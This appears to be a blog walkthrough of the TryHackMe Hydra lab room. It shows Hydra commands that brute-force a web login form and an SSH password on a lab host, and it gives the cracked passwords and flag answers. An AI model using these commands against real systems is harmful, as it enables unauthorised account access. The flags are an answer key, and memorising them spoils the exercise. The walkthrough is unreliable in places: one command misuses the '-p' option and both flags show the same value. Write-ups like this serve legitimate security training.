In this walk through, we will be going through the Hydra room from Tryhackme. This room will teach us about and use of Hydra, a fast network logon cracker, to bruteforce and obtain a website’s credentials. On that note, let’s get started.
Task 1 – Hydra Introduction
Question 1 – Read the above and have Hydra at the ready.
Done
Task 2 – Using Hydra
Question 1 – Use Hydra to bruteforce molly’s web password. What is flag 1?
- We will start off with a nmap scan to discover the open ports and running services. Found two ports open – 22 (SSH) and 80 (HTTP).
- On Port 80, we found a login page. We will use hydra to bruteforce its password.
- Now, we used Burpsuite to capture the post request and get the username and password field implementation as it is required by the hydra command arguments.
- Use the following command to bruteforce the HTTP login password using hydra.
#Use command to bruteforce the login page. hydra -l molly -p ~/Desktop/rockyou.txt 10.10.135.55 http-post-form "/login:username=^USER^&password=^PASS^:Your username or password is incorrect." -V
- Using the username: molly and password: sunshine, login into the application and claim the flag 1.
THM{2673a7dd116de68e85c48ec0b1f2612e}
Question 2 – Use Hydra to bruteforce molly’s SSH password. What is flag 2?
- Use the following command to bruteforce the server’s SSH password.
#Use the command to bruteforce the SSH login. hydra -l molly -P ~/Downloads/rockyou.txt ssh://10.10.135.55
- Use the username: molly and password: butterfly to login into the SSH server and claim the Flag 2.
THM{2673a7dd116de68e85c48ec0b1f2612e}
Also Read: Tryhackme – h4cked
So that was “Hydra” room for you. We learned what hydra is and its usage. Next we used it bruteforce a web application login page and with the found credentials to get out first flag. Further, we used it again to bruteforce the SSH password and claimed the second flag. In your CTF and pentesting journey, you will be using hydra to bruteforcing the common services password. So, this is one of the tool that is a must in your arsenal. Hope you found this article handy. On that note, i will take your leave but remember to “Keep Hacking”.